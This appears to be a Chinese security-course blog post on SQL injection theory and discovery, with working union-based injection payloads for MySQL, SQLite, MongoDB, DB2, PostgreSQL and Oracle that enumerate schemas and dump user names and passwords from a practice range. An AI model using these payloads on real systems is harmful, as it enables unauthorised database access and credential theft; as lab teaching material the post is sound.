喝奶茶的Blair
喝奶茶的Blair

web攻防-SQL注入&数据库类型&用户权限&架构分层&符号干扰&利用过程&发现思路(小迪安全Day53天)

数据库知识:

1、数据库名,表名,列名,数据

2、自带数据库,数据库用户及权限

mysql root最高权限用户

自带数据库:information_schema,mysql,performance_schema

testcms www.testcms.com 数据库用户 test

fastcms www.fastcms.com 数据库用户 fast

数据库用户:管理数据库的用户权限

一对一进行管理数据库,不会造成越级

3、数据库敏感函数,默认端口及应用

load_file()等

默认端口判断数据库类型

4、数据库查询方法(增加删除修改更新)

sql注入理论

产生原因:代码中执行的SQL语句存在可控变量导致

影响SQL注入的主要因素:
1、数据库类型(权限操作)

数据库的类型不同,攻击语句也不同

2、数据操作方法(增删改查)

判断sql注入操作点,比如可以添加数据库管理员的地方那么就要围绕insert语句进行注入

3、参数数据类型(符号干扰)

跟开发有关系,是整数型,还是字符型

4、参数数据格式(加密编码等)(这两者也可以融合在一起)

  • 加密解码

    代码逻辑,对数据进行解密解码,带入到sql执行中

    攻击时必须要把这个数据库按照他的加密或编码带进去

  • 数据格式

    代码逻辑,对数据进行格式提取,带入到sql执行中

    比如:

    • get

      ?id=1

      ?id=xiaodi

    • ?id={name:‘xiaodi’,passwd:‘12345’}

    • ?id=xiaodi12345

5、提交数据方式(数据包部分)

提交数据的方式不同,接受的地方也不同,sql注入产生的地方也会在看不到的地方,比如:

当要验证是否是手机端的,就会查找user-agent

web攻防-SQL注入&数据库类型&用户权限&架构分层&符号干扰&利用过程&发现思路(小迪安全Day53天)_第1张图片

6、有无数据处理(无回显逻辑等)

手段:延迟等

黑盒/白盒如何发现SQL注入

1、盲对所有参数进行测试

虽然覆盖全面,

但可能会有误测(false negative/false positive)。

  • 误测1:假阴性

    (未发现实际存在的 SQL 注入)

    • 如果某个参数的值经过加密或其他预处理(如编码、哈希),直接注入可能无效,导致测试工具测不出注入点。
    • 例如,如果参数是 id=123,但它在后台会被加密为 xyz789,那么直接对 id=123' OR '1'='1 进行测试是无效的,必须先分析加密方式,再构造合适的 payload。

  • 误测2:假阳性

    (误认为存在 SQL 注入)

    • 某些系统可能有自定义拦截机制或异常处理机制,导致返回的信息不标准,使得测试工具误判为 SQL 注入。

2、整合功能点脑补进行测试

适用于某些需要特定条件才能触发的 SQL 注入点。例如,某些 SQL 语句可能只有在用户拥有特定权限或者某个状态下才能执行,这种情况工具很难直接测出,需要手动推测并构造合适的测试数据。

白盒参考后期代码审计课程

利用过程:

获取数据库名->表名->列名->数据(一般是关键数据,如管理员)

靶场:https://mozhe.cn/Special/SQL_Injection

mysql

?id=1fsfafa

?id=-1 union select 1,2,3,4

?id=-1 union select 1,group_concat(database()),3,4

?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’ and table_schema=‘mozhe_Discuz_StormGroup’

?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

sqLite

https://blog.csdn.net/qq_32393893/article/details/103083240

union select 1,name,sql,4 from sqlite_master limit 0,1

union select 1,name,password,4 from WSTMart_reg

MongoDB

https://blog.csdn.net/m0_75036923/article/details/141364038

id=1’});return ({title:‘1’,content:'2

'});return ({content:tojson(db.getCollectionNames()),title:'1

‘});return ({content:tojson(db.Authority_confidential.find()[0]),title:’

分析:

({'id':'$id'});return data;
({'id':'id=1'});return ({title:'1',content:'2'});return data;

DB2

id=-1 union select 1,2,3,4 from syscat.tables

id=-1 union select 1,current schema,current server,4 from sysibm.sysdummy1

id=-1 union select 1,current schema,tabname,4 from syscat.tables where tabschema=current schema limit 0,1

id=-1 union select 1,colname,tabname,4 from syscat.columns where tabschema=current schema and tabname=‘GAME_CHARACTER’ limit 1,1

id=-1 union select 1,colname,tabname,4 from syscat.columns where tabschema=current schema and tabname=‘GAME_CHARACTER’ limit 2,1

id=-1 union select 1,NAME,PASSWORD,4 from GAME_CHARACTER limit 0,1

id=-1 union select 1,NAME,PASSWORD,4 from GAME_CHARACTER limit 1,1

PostgreSQL

https://blog.csdn.net/2401_88387979/article/details/144275425

and 1=2 union select ‘null’,null,null,null

and 1=2 union select null,‘null’,null,null

and 1=2 union select null,null,string_agg(datname,‘,’),null from pg_database

and 1=2 union select null,null,string_agg(tablename,‘,’),null from pg_tables where schemaname=‘public’

and 1=2 union select null,null,string_agg(column_name,‘,’),null from information_schema.columns where table_name=‘reg_users’

and 1=2 union select null,string_agg(name,‘,’),string_agg(password,‘,’),null from reg_users

Oracle

https://blog.csdn.net/A2893992091/article/details/141365829

and 1=2 union select (select distinct owner from all_tables where rownum=1),‘2’ from dual

and 1=2 union select (select table_name from user_tables where rownum=1),‘2’ from dual

and 1=2 union select (select table_name from user_tables where rownum=1 and table_name like ‘%user%’),‘2’ from dual

and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name=‘sns_users’),‘2’ from dual

and 1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’)),‘2’ from dual

and 1=2 union select USER_NAME,USER_PWD from “sns_users”

1=2 union select (select column_name from all_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’)),‘2’ from dual

and 1=2 union select USER_NAME,USER_PWD from “sns_users”

and 1=2 union select USER_NAME,USER_PWD from “sns_users” where user_name not in (‘hu’)

你可能感兴趣的:(小迪安全,sql,安全,web安全,数据库)

  • MCP-Proxy:开发多LLM & 多MCP 支持并安全访问MCP Server的秘密 IT古董 技术杂谈安全MCPMCP-Proxy
    在构建多模型、多协议、可控可信的大模型接入平台时,MCP-Proxy扮演着关键中枢。它不仅要支持多个LLM接入,还要保障对后端MCPServer的安全访问、请求审计、能力切换与资源隔离。什么是MCP/MCP-Proxy?MCP(ModelCapabilityProtocol)是新一代模型能力调用协议,类似于OpenAI的API,但可支持:多厂商大模型(OpenAI、DeepSeek、Yi、Chat
  • 企业级知识库私有化部署:腾讯混元+云容器服务TKE实战 大熊计算机 #腾讯云语言模型
    1.背景需求分析在金融、医疗等数据敏感行业,企业需要构建完全自主可控的知识库系统。本文以某证券机构智能投研系统为原型,演示如何基于腾讯混元大模型与TKE容器服务实现:千亿级参数模型的私有化部署金融领域垂直场景微调高并发低延迟推理服务全链路安全合规方案1.1典型技术挑战#性能基准测试数据(单位:QPS)|场景|裸机部署|容器化部署|优化后||--------------------|--------
  • MySQL表达式之公用表表达式(CTE)的使用示例 @Corgi 后端开发mysql数据库CTE
    示例一数据表中有每个企业每年每月并且每月的产值是累加的数据的数据记录需求:统计企业产值能力,找出所有家企业中产值最高的企业,其产值记为P。对于第i家企业,其产值为Pi则该企业的产值能力评分=Pi/P×100。SQL:--使用ROW_NUMBER()为每个企业每年每个月的产值排名,筛选出每个企业每年最大月份的产值。WITHMaxMonthlyOutputAS(SELECTcompany_id,dec
  • SnowConvert:自动化数据迁移的技术解析与最佳实践 weixin_30777913 迁移学习数据库运维
    SnowConvert是Snowflake生态系统的关键迁移工具,专为将传统数据仓库(如Oracle、Teradata、SQLServer等)的代码资产高效、准确地转换为Snowflake原生语法而设计。以下基于官方文档对其技术原理、工作流程及最佳实践进行深入分析:一、SnowConvert核心技术解析精准的语法映射引擎语言支持:深度解析源系统特有语法(OraclePL/SQL,TeradataB
  • GitHub Actions与AWS OIDC实现安全的ECR/ECS自动化部署 ivwdcwso 运维与云原生githubaws安全ecrecsoldcCI/CD
    引言在现代云原生应用开发中,实现安全、高效的CI/CD流程至关重要。本文将详细介绍如何利用GitHubActions和AWSOIDC(OpenIDConnect)构建一个无需长期凭证的安全部署管道,将容器化应用自动部署到AmazonECR和ECS服务。架构概述整个解决方案的架构包含三个主要部分:GitHub端:代码仓库和GitHubActions工作流AWS端:OIDC身份验证、ECR容器仓库和E
  • AWS Lambda与RDS连接优化之旅 t0_54manong 编程问题解决手册aws云计算个人开发
    在云计算的时代,AWSLambda与RDS的结合为开发者提供了高效且灵活的解决方案。然而,在实际应用中,我们常常会遇到一些性能瓶颈。本文将通过一个真实案例,探讨如何优化AWSLambda与RDS之间的连接,以提高API的响应速度。背景介绍最近,我们在AWS上部署了一个使用Dotnet6开发的API,它通过APIGateway暴露给外部,并连接到同VPC内的MySQLAuroraRDS数据库。部署前
  • Redis配置与优化 ?ccc? redis数据库缓存
    目录一:Redis介绍1:关系数据库与非关系型数据库2:Redis基础2.1Redis简介2.2Redis安装部署2.3配置参数3:Redis命令工具3.1redis-cli命令行工具3.2redis-benchmark测试工具4:Redis数据库常用命令4.1key相关命令4.2多数据库常用命令二:Redis持久化1:RDB和AOF的区别2:RDB和AOF的优缺点3:Redis持久化配置三:性能
  • 疲劳检测与行为分析:工厂智能化实践 智驱力人工智能 安全智慧城市行为识别人员属性识别疲劳检测抽烟检测徘徊检测
    视觉分析算法赋能工厂疲劳与安全管理一、背景与需求在制造业中,疲劳作业是导致安全事故和效率下降的核心因素之一。传统人工巡检存在覆盖面不足、响应滞后等问题,而基于视觉分析的智能监控系统通过多算法协同,可实现全天候、高精度的疲劳检测与行为管理。本文围绕疲劳检测算法、人员计数算法、抽烟检测算法及徘徊检测算法,探讨其在工厂场景中的技术实现与应用价值。二、技术实现疲劳检测算法原理:基于PERCLOS(眼睑闭合
  • 技术调研:时序数据库(一) myskybeyond 时序数据库时序数据库数据库
    选择时序数据库时,选择当下主流的解决方案。目前主流的开源解决方案有InfluxDB、TDengine和TimescaleDB。下文从多个维度对比分析,最终根据需求做出选型决策。1.核心架构与设计理念数据库架构特点核心优势InfluxDB-专为时序数据设计的分布式数据库-基于时间线(TimeSeries)模型-开源版(OSS)与商业版(Cloud/Enterprise)功能差异大高写入吞吐量、原生支
  • Nginx服务部署与配置 月堂 nginx运维
    目录HTTPS访问配置(又称自签名)1、SSL简介2、HTTPS工作流程(重要)3、自留签名证书location配置作用匹配规则匹配优先级rewrite配置HTTPS访问配置(又称自签名)1、SSL简介SSL(SecureSocketsLayer)安全套接层。是由Netscape(网景)公司于1990年开发,用于保障WordWideWeb(WWW)通讯的安全。主要任务是提供私密性,信息完整性和身份
  • 高可用与低成本兼得:全面解析 TDengine 时序数据库双活与双副本 TDengine (老段) TDengine案例分析时序数据库tdengine大数据涛思数据数据库物联网iot
    在现代数据管理中,企业对于可靠性、可用性和成本的平衡有着多样化的需求。为此,TDengine在3.3.0.0版本中推出了两种不同的企业级解决方案:双活方案和基于仲裁者的双副本方案,以满足不同应用场景下的特殊需求。本文将详细探讨这两种方案的适用场景、技术特点及其最佳实践,让大家深入了解这两大方案如何帮助企业在高效可靠的数据存储和管理中取得成功。TDengine双副本(+仲裁者)为了满足部分客户在保证
  • linux mysql命令行操作
    命令行,linux,命令行操作相关学习资料:https://edu.51cto.com/video/797.htmlhttps://edu.51cto.com/video/1400.htmlhttps://edu.51cto.com/video/3832.htmlLinuxMySQL命令行操作入门指南作为一名刚入行的开发者,掌握Linux系统下的MySQL命令行操作是一项基本技能。本文将带你一步步
  • 【C++】String的使用 nanguochenchuan C++c++开发语言
    字符串基础概念std::stringvsC风格字符串std::string是C++标准库提供的字符串类,相比C风格的char*具有明显优势:自动内存管理丰富的成员函数安全的边界检查支持运算符重载#include//必须包含的头文件std::strings1;//空字符串std::strings2="Hello";//直接初始化charcstr[]="World";std::strings3(cst
  • Sonatype Nexus3安装配置及使用 無法複制 nexus
    1、简介SonatypeNexusRepositoryManager是一款强大的仓库管理工具,用于存储、管理和发布软件组件。它能够支持多种格式的仓库,如Maven、npm、Docker等。在企业开发中,私有Maven仓库常用于存储自定义依赖和发布组件,确保代码安全性和内部共享。本文将从服务器环境搭建、Nexus安装与配置、仓库创建、依赖上传,再到Maven项目中使用私有仓库的全过程,帮助你掌握如何
  • 9 个 GraphQL 安全最佳实践 先行者-阿佰 graphql安全后端
    GraphQL已被最大的平台采用-Facebook、Twitter、Github、Pinterest、Walmart-这些大公司不能在安全性上妥协。但是,尽管GraphQL可以成为您的API的非常安全的选项,但它并不是开箱即用的。事实恰恰相反:即使是最新手的黑客,所有大门都是敞开的。此外,GraphQL有自己的一套注意事项,因此如果您来自REST,您可能会错过一些重要步骤!2024年,有关Hack
  • TDengine 3.3.5.0 新功能 —— 查看库文件占用空间、压缩率 TDengine (老段) TDengine产品设计数据库时序数据库物联网tdengine涛思数据iot
    1.背景TDengine之前版本一直没有通过SQL命令查看数据库占用的磁盘空间大小,从3.3.5.0开始,增加了这个方便且实用的小功能,这里详细介绍下。2.SQL基本语法selectexprfrominformation_schema.ins_disk_usage[wherecondtion]行为说明:查看各个vgroup的各个组件磁盘占用情况,并且可以通过查询语句计算压缩率等。示例:taos>s
  • 转行要趁早!网络安全行业人才缺口大,企业招聘需求正旺!
    网络安全行业具有人才缺口大、岗位选择多、薪资待遇好、学历要求不高等优势,对于想要转行的人员来说,是一个非常不错的选择。人才缺口大网络安全攻防技术手段日新月异,特别是现在人工智能技术飞速发展,网络安全形势复杂严峻,人才重要性凸显。教育部《网络安全人才实战能力白皮书》数据显示,到2027年,我国网络安全人员缺口将达327万。近期发布的《2024年网络安全产业人才发展报告》中提到,沿用ISC2的人才缺口
  • 【为什么网络安全缺口很大,而招聘却很少?】 网络安全工程师教学 安全黑客技术网络安全web安全网络安全游戏数据库
    为什么网络安全缺口很大,而招聘却很少?2020年我国网络空间安全人才数量缺口超过了140万,就业人数却只有10多万,缺口高达了93%。这里就有人会问了:1、网络安全行业为什么这么缺人?2、明明人才那么稀缺,为什么招聘时招安全的人员却没有那么多呢?首先来回答第一个问题,从政策背景、市场需求、行业现状来说。政策背景自从斯诺登棱镜门事件曝光之后,网络空间站成为现代战场第一战场,网络安全能力也被各国列为了
  • Web3解读:解锁去中心化网络的潜力 清 晨 反侦测指纹浏览器社交媒体web3去中心化区块链tiktokfacebookinstagramClonBrowser
    随着互联网技术的飞速发展,我们正在进入一个新的时代——Web3。Web3不仅仅是一个技术概念,它代表了一种全新的网络架构和价值交换方式。本文将深入探讨Web3的核心理念,以及它如何解锁去中心化网络的潜力。什么是Web3?Web3是一个基于区块链技术的去中心化网络,它旨在提供一个更加开放、透明和安全的互联网环境。与传统的Web2相比,Web3强调用户对数据的控制权,以及数据的不可篡改性。在Web3中
  • TDengine 技术参数配置大全 TDengine (老段) TDengine产品设计tdengine涛思数据大数据数据库物联网时序数据库
    1.背景TDengine的taos.cfg中配置项及使用SQL命令alter修改的系统变量之间的关系如何,哪些是持久存储项,哪些设置是临时项,这章将详细说明。本文是技术参考资料,请收藏。2.定义1.全局配置参数全局配置参数:作用于集群内所有dnode且在集群内必须保持一致的变量,也称为全局变量、系统变量或全局参数。例如:timezone/charset/countAlwaysReturnValue
  • 【Python常用模块】_Pandas模块3-DataFrame对象 失心疯_2023 Python常用模块数据分析pandas数据挖掘python数据统计数据处理
    课程推荐我的个人主页:失心疯的个人主页入门教程推荐:Python零基础入门教程合集虚拟环境搭建:Python项目虚拟环境(超详细讲解)PyQt5系列教程:PythonGUI(PyQt5)教程合集Oracle数据库教程:Oracle数据库教程合集MySQL数据库教程:MySQL数据库教程合集优质资源下载:资源下载合集
  • 使用 C 语言操作 MySQL 实现图片写入与读取 (Charon) mysql数据库
    在实际项目中,常常需要将图片或文件以二进制方式存储至数据库中,并能正确读取还原为文件。本文以C语言配合MySQLCAPI为例,完整演示如何实现将一张JPG图片写入数据库并再读出生成新图片文件的过程。项目背景我们使用如下表结构:--创建用户信息表CREATETABLETBL_USER(U_IDINTPRIMARYKEYAUTO_INCREMENT,--用户编号,整型,主键,自动递增,系统自动分配唯一
  • Cursor MySQL MCP 完整操作配置指南 z日火 开发分享mcpcursormysql
    概述本指南帮助您在Windows环境下配置Cursor编辑器的MySQLMCP服务器,实现通过AI助手对数据库进行完整的增删改查操作。功能特性:✅自然语言数据库查询✅智能数据插入和更新✅安全的数据删除操作✅自动数据分析和报告生成快速配置1.环境检查#检查必要组件node--version#Node.js>=16mysql--version#MySQL5.7+cursor--version#Curs
  • 【C++】命令模式
    目录一、模式核心概念与结构二、C++实现示例:遥控器与家电控制三、命令模式的关键特性四、应用场景五、命令模式与其他设计模式的关系六、C++标准库中的命令模式应用七、优缺点分析八、实战案例:数据库事务命令九、实现注意事项如果这篇文章对你有所帮助,渴望获得你的一个点赞!命令模式(CommandPattern)是一种【行为型】设计模式,它将请求封装为对象,从而使你可以用不同的请求对客户端进行参数化,对请
  • mybatis批量插入数据时,如果是sql server库只返回一条自增主键 小小不吃香菜 mybatissqlserverjava
    有个功能需要做个批量插入,表是自增主键,本来是很简单的事情,结果一测试发现一个神奇的事情,由于数据库是sqlserver的,插入一条时,id可以正常返回,多条时,就出现了标题的问题,只返回一个id,使用的是mybatis自带的jar包,甚至如何使用人家还加了备注在里面,很清晰,是这样的:然后我就按照上面描述的,自己加了一个自定义的Mapper,把主键名称改成我自己的,然后发现依然只能获取到一条,后
  • 10招提升SQL性能的实战技巧 快乐才是自己的 sqlmysqlsqlmysqloracledatabasehadoop大数据
    SQL语句常见性能优化方案在数据库应用中,SQL性能优化是核心技术要点。以下是经过验证的优化策略,按关键维度分类:一、索引优化精准索引覆盖对高频查询的WHERE、JOIN、ORDERBY字段建立索引复合索引遵循最左前缀原则:索引(a,b,c)仅支持WHEREa=?或WHEREa=?ANDb=?示例:将SELECT*FROMordersWHEREstatus='shipped'改为CREATEIND
  • java毕业设计房产中介系统mybatis+源码+调试部署+系统+数据库+lw 兮兮科技 javamybatis开发语言
    java毕业设计房产中介系统mybatis+源码+调试部署+系统+数据库+lwjava毕业设计房产中介系统mybatis+源码+调试部署+系统+数据库+lw本源码技术栈:项目架构:B/S架构开发语言:Java语言开发软件:ideaeclipse前端技术:Layui、HTML、CSS、JS、JQuery等技术后端技术:JAVA运行环境:Win10、JDK1.8数据库:MySQL5.7/8.0源码地址
  • MongoDB与Redis有哪些区别 相遇在春风里 经验分享
    MongoDB和Redis是两种不同类型的数据库,它们存在以下区别:一、数据模型MongoDBMongoDB是一个文档型数据库,它使用BSON(BinaryJSON)格式存储数据。数据以类似JSON的文档形式组织,每个文档可以有不同的结构(即模式自由)。例如,在一个存储用户信息的集合中,一个用户文档可能包含姓名、年龄、地址等字段,而另一个用户文档可能还包含额外的兴趣爱好字段。这种数据模型非常适合处
  • redis的scan使用详解,结合spring使用详解 黑皮爱学习 redis自学笔记redisspring数据库
    Redis的SCAN命令是一种非阻塞的迭代器,用于逐步遍历数据库中的键,特别适合处理大数据库。下面详细介绍其使用方法及在Spring框架中的集成方式。SCAN命令基础SCAN命令的基本语法:SCANcursor[MATCHpattern][COUNTcount]cursor:迭代游标,初始为0,每次迭代返回新的游标值。MATCHpattern:可选,用于过滤键的模式(如user:*)。COUNTc
  • 线上正常,本地调用deepseek接口报错:Error:SSL certificate problem: unable to get local issuer certificate 落落鱼2013 ssl服务器网络协议deepseek
    如题,线上调用deepseek接口正常,但本地调用接口时报以下错误:Error:SSLcertificateproblem:unabletogetlocalissuercertificate。问了下豆包,得知是缺少本地证书的问题。然后用小P配置了ssl证书用https访问依旧不行,报错不变:解决办法:调用curl函数时添加以下配置项:curl_setopt($ch,CURLOPT_SSL_VERI
  • iOS http封装 374016526 ios服务器交互http网络请求
    程序开发避免不了与服务器的交互,这里打包了一个自己写的http交互库。希望可以帮到大家。   内置一个basehttp,当我们创建自己的service可以继承实现。   KuroAppBaseHttp *baseHttp = [[KuroAppBaseHttp alloc] init]; [baseHttp setDelegate:self]; [baseHttp
  • lolcat :一个在 Linux 终端中输出彩虹特效的命令行工具 brotherlamp linuxlinux教程linux视频linux自学linux资料
      那些相信 Linux 命令行是单调无聊且没有任何乐趣的人们,你们错了,这里有一些有关 Linux 的文章,它们展示着 Linux 是如何的有趣和“淘气” 。 在本文中,我将讨论一个名为“lolcat”的小工具 – 它可以在终端中生成彩虹般的颜色。 何为 lolcat ? Lolcat 是一个针对 Linux,BSD 和 OSX 平台的工具,它类似于 cat 命令,并为 cat
  • MongoDB索引管理(1)——[九] eksliang mongodbMongoDB管理索引
    转载请出自出处:http://eksliang.iteye.com/blog/2178427 一、概述       数据库的索引与书籍的索引类似,有了索引就不需要翻转整本书。数据库的索引跟这个原理一样,首先在索引中找,在索引中找到条目以后,就可以直接跳转到目标文档的位置,从而使查询速度提高几个数据量级。       不使用索引的查询称
  • Informatica参数及变量 18289753290 Informatica参数变量
    下面是本人通俗的理解,如有不对之处,希望指正 info参数的设置:在info中用到的参数都在server的专门的配置文件中(最好以parma)结尾 下面的GLOBAl就是全局的,$开头的是系统级变量,$$开头的变量是自定义变量。如果是在session中或者mapping中用到的变量就是局部变量,那就把global换成对应的session或者mapping名字。 [GLOBAL] $Par
  • python 解析unicode字符串为utf8编码字符串 酷的飞上天空 unicode
    php返回的json字符串如果包含中文,则会被转换成\uxx格式的unicode编码字符串返回。 在浏览器中能正常识别这种编码,但是后台程序却不能识别,直接输出显示的是\uxx的字符,并未进行转码。   转换方式如下   >>> import json >>> q = '{"text":"\u4
  • Hibernate的总结 永夜-极光 Hibernate
    1.hibernate的作用,简化对数据库的编码,使开发人员不必再与复杂的sql语句打交道   做项目大部分都需要用JAVA来链接数据库,比如你要做一个会员注册的 页面,那么 获取到用户填写的 基本信后,你要把这些基本信息存入数据库对应的表中,不用hibernate还有mybatis之类的框架,都不用的话就得用JDBC,也就是JAVA自己的,用这个东西你要写很多的代码,比如保存注册信
  • SyntaxError: Non-UTF-8 code starting with '\xc4' 随便小屋 python
    刚开始看一下Python语言,传说听强大的,但我感觉还是没Java强吧! 写Hello World的时候就遇到一个问题,在Eclipse中写的,代码如下 ''' Created on 2014年10月27日 @author: Logic ''' print("Hello World!");  运行结果 SyntaxError: Non-UTF-8
  • 学会敬酒礼仪 不做酒席菜鸟 aijuans 菜鸟
    俗话说,酒是越喝越厚,但在酒桌上也有很多学问讲究,以下总结了一些酒桌上的你不得不注意的小细节。 细节一:领导相互喝完才轮到自己敬酒。敬酒一定要站起来,双手举杯。 细节二:可以多人敬一人,决不可一人敬多人,除非你是领导。 细节三:自己敬别人,如果不碰杯,自己喝多少可视乎情况而定,比如对方酒量,对方喝酒态度,切不可比对方喝得少,要知道是自己敬人。 细节四:自己敬别人,如果碰杯,一
  • 《创新者的基因》读书笔记 aoyouzi 读书笔记《创新者的基因》
    创新者的基因   创新者的“基因”,即最具创意的企业家具备的五种“发现技能”:联想,观察,实验,发问,建立人脉。   第一部分破坏性创新,从你开始 第一章破坏性创新者的基因 如何获得启示: 发现以下的因素起到了催化剂的作用:(1) -个挑战现状的问题;(2)对某项技术、某个公司或顾客的观察;(3) -次尝试新鲜事物的经验或实验;(4)与某人进行了一次交谈,为他点醒
  • 表单验证技术 百合不是茶 JavaScriptDOM对象String对象事件
    js最主要的功能就是验证表单,下面是我对表单验证的一些理解,贴出来与大家交流交流  ,数显我们要知道表单验证需要的技术点, String对象,事件,函数   一:String对象;通常是对字符串的操作;   1,String的属性;   字符串.length;表示该字符串的长度; var str= "java"
  • web.xml配置详解之context-param bijian1013 javaservletweb.xmlcontext-param
    一.格式定义: <context-param> <param-name>contextConfigLocation</param-name> <param-value>contextConfigLocationValue></param-value> </context-param> 作用:该元
  • Web系统常见编码漏洞(开发工程师知晓) Bill_chen sqlPHPWebfckeditor脚本
    1.头号大敌:SQL Injection 原因:程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果, 获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 本质: 对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。 示例: String query = "SELECT id FROM users
  • 【MongoDB学习笔记六】MongoDB修改器 bit1129 mongodb
    本文首先介绍下MongoDB的基本的增删改查操作,然后,详细介绍MongoDB提供的修改器,以完成各种各样的文档更新操作  MongoDB的主要操作 show dbs 显示当前用户能看到哪些数据库 use foobar 将数据库切换到foobar show collections 显示当前数据库有哪些集合 db.people.update,update不带参数,可
  • 提高职业素养,做好人生规划 白糖_ 人生
      培训讲师是成都著名的企业培训讲师,他在讲课中提出的一些观点很新颖,在此我收录了一些分享一下。注:讲师的观点不代表本人的观点,这些东西大家自己揣摩。   1、什么是职业规划:职业规划并不完全代表你到什么阶段要当什么官要拿多少钱,这些都只是梦想。职业规划是清楚的认识自己现在缺什么,这个阶段该学习什么,下个阶段缺什么,又应该怎么去规划学习,这样才算是规划。  
  • 国外的网站你都到哪边看? bozch 技术网站国外
    学习软件开发技术,如果没有什么英文基础,最好还是看国内的一些技术网站,例如:开源OSchina,csdn,iteye,51cto等等。 个人感觉如果英语基础能力不错的话,可以浏览国外的网站来进行软件技术基础的学习,例如java开发中常用的到的网站有apache.org 里面有apache的很多Projects,springframework.org是spring相关的项目网站,还有几个感觉不错的
  • 编程之美-光影切割问题 bylijinnan 编程之美
    package a; public class DisorderCount { /**《编程之美》“光影切割问题” * 主要是两个问题: * 1.数学公式(设定没有三条以上的直线交于同一点): * 两条直线最多一个交点,将平面分成了4个区域; * 三条直线最多三个交点,将平面分成了7个区域; * 可以推出:N条直线 M个交点,区域数为N+M+1。
  • 关于Web跨站执行脚本概念 chenbowen00 Web安全跨站执行脚本
    跨站脚本攻击(XSS)是web应用程序中最危险和最常见的安全漏洞之一。安全研究人员发现这个漏洞在最受欢迎的网站,包括谷歌、Facebook、亚马逊、PayPal,和许多其他网站。如果你看看bug赏金计划,大多数报告的问题属于 XSS。为了防止跨站脚本攻击,浏览器也有自己的过滤器,但安全研究人员总是想方设法绕过这些过滤器。这个漏洞是通常用于执行cookie窃取、恶意软件传播,会话劫持,恶意重定向。在
  • [开源项目与投资]投资开源项目之前需要统计该项目已有的用户数 comsci 开源项目
            现在国内和国外,特别是美国那边,突然出现很多开源项目,但是这些项目的用户有多少,有多少忠诚的粉丝,对于投资者来讲,完全是一个未知数,那么要投资开源项目,我们投资者必须准确无误的知道该项目的全部情况,包括项目发起人的情况,项目的维持时间..项目的技术水平,项目的参与者的势力,项目投入产出的效益.....
  • oracle alert log file(告警日志文件) daizj oracle告警日志文件alert log file
    The alert log is a chronological log of messages and errors, and includes the following items: All internal errors (ORA-00600), block corruption errors (ORA-01578), and deadlock errors (ORA-00060)
  • 关于 CAS SSO 文章声明 denger SSO
    由于几年前写了几篇 CAS 系列的文章,之后陆续有人参照文章去实现,可都遇到了各种问题,同时经常或多或少的收到不少人的求助。现在这时特此说明几点: 1.  那些文章发表于好几年前了,CAS 已经更新几个很多版本了,由于近年已经没有做该领域方面的事情,所有文章也没有持续更新。 2. 文章只是提供思路,尽管 CAS 版本已经发生变化,但原理和流程仍然一致。最重要的是明白原理,然后
  • 初二上学期难记单词 dcj3sjt126com englishword
    lesson 课 traffic 交通 matter 要紧;事物 happy 快乐的,幸福的 second 第二的 idea 主意;想法;意见 mean 意味着 important 重要的,重大的 never 从来,决不 afraid 害怕 的 fifth 第五的 hometown 故乡,家乡 discuss 讨论;议论 east 东方的 agree 同意;赞成 bo
  • uicollectionview 纯代码布局, 添加头部视图 dcj3sjt126com Collection
    #import <UIKit/UIKit.h> @interface myHeadView : UICollectionReusableView { UILabel *TitleLable; } -(void)setTextTitle; @end #import "myHeadView.h" @implementation m
  • N 位随机数字串的 JAVA 生成实现 FX夜归人 javaMath随机数Random
    /** * 功能描述 随机数工具类<br /> * @author FengXueYeGuiRen * 创建时间 2014-7-25<br /> */ public class RandomUtil { // 随机数生成器 private static java.util.Random random = new java.util.R
  • Ehcache(09)——缓存Web页面 234390216 ehcache页面缓存
    页面缓存 目录 1       SimplePageCachingFilter 1.1      calculateKey 1.2      可配置的初始化参数 1.2.1     cach
  • spring中少用的注解@primary解析 jackyrong primary
    这次看下spring中少见的注解@primary注解,例子 @Component public class MetalSinger implements Singer{ @Override public String sing(String lyrics) { return "I am singing with DIO voice
  • Java几款性能分析工具的对比 lbwahoo java
    Java几款性能分析工具的对比 摘自:http://my.oschina.net/liux/blog/51800   在给客户的应用程序维护的过程中,我注意到在高负载下的一些性能问题。理论上,增加对应用程序的负载会使性能等比率的下降。然而,我认为性能下降的比率远远高于负载的增加。我也发现,性能可以通过改变应用程序的逻辑来提升,甚至达到极限。为了更详细的了解这一点,我们需要做一些性能
  • JVM参数配置大全 nickys jvm应用服务器
    JVM参数配置大全 /usr/local/jdk/bin/java -Dresin.home=/usr/local/resin -server -Xms1800M -Xmx1800M -Xmn300M -Xss512K -XX:PermSize=300M -XX:MaxPermSize=300M -XX:SurvivorRatio=8 -XX:MaxTenuringThreshold=5 -
  • 搭建 CentOS 6 服务器(14) - squid、Varnish rensanning varnish
    (一)squid 安装 # yum install httpd-tools -y # htpasswd -c -b /etc/squid/passwords squiduser 123456 # yum install squid -y 设置 # cp /etc/squid/squid.conf /etc/squid/squid.conf.bak # vi /etc/
  • Spring缓存注解@Cache使用 tom_seed spring
    参考资料 http://www.ibm.com/developerworks/cn/opensource/os-cn-spring-cache/ http://swiftlet.net/archives/774   缓存注解有以下三个: @Cacheable      @CacheEvict     @CachePut
  • dom4j解析XML时出现"java.lang.noclassdeffounderror: org/jaxen/jaxenexception"错误 xp9802
    java.lang.NoClassDefFoundError: org/jaxen/JaxenExc 关键字: java.lang.noclassdeffounderror: org/jaxen/jaxenexception 使用dom4j解析XML时,要快速获取某个节点的数据,使用XPath是个不错的方法,dom4j的快速手册里也建议使用这种方式 执行时却抛出以下异常: Exceptio
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他